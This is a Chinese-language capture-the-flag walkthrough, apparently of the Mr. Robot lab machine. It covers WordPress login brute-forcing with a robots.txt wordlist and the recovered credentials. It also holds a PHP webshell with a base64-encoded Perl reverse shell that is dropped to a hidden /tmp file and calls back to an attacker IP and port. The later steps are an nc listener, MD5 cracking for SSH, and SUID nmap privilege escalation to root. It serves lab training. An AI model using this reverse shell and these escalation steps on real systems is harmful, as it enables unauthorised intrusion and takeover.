没啥信息,尝试扫下目录
发现有wp-admin/和robots.txt
robots.txt里面还拿到了一个密码字典,猜测是爆破wp的网站账号密码的
┌──(rootkali)-[~/桌面]
└─# sort -u fsocity.dic > wp.txt
利用burp爆破,发现账号和密码:
账号:elliot
密码:ER28-0652
木马:
'perl','c'=>'c');
$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj".
"aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR".
"hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT".
"sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI".
"kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi".
"KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl".
"OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
cf('/tmp/.bc',$back_connect);
$res = execute(which('perl')." /tmp/.bc $yourip $yourport &");
?>
┌──(rootkali)-[~/桌面]
└─# nc -lvvp 4444
再访问404.php,就可以进行反弹shell了
http://192.168.103.183/404.php
python3 -c 'import pty; pty.spawn("/bin/bash")' #交互式shell
在robot目录下有key2,但是直接访问没权限
但是有一个md5加密的密码,所以猜测md5解密以后
可以利用ssh远程登录
MD5免费在线解密破解_MD5在线加密-SOMD5
密码:
abcdefghijklmnopqrstuvwxyz
1.查看只有SUID的二进制可执行文件
find / -user root -perm -4000 -print 2>/dev/null
2.已知的可用来提权的linux可行性的文件列表如下:
nmap、Vim、find、bash、more、less、Nano、cp
3.进入namp可交互式模式(仅限2.02-5.21版本)
nmap --interactive
4.提权root
! sh
1.进入namp可交互式模式(仅限2.02-5.21版本)
nmap --interactive
2.提权root
! sh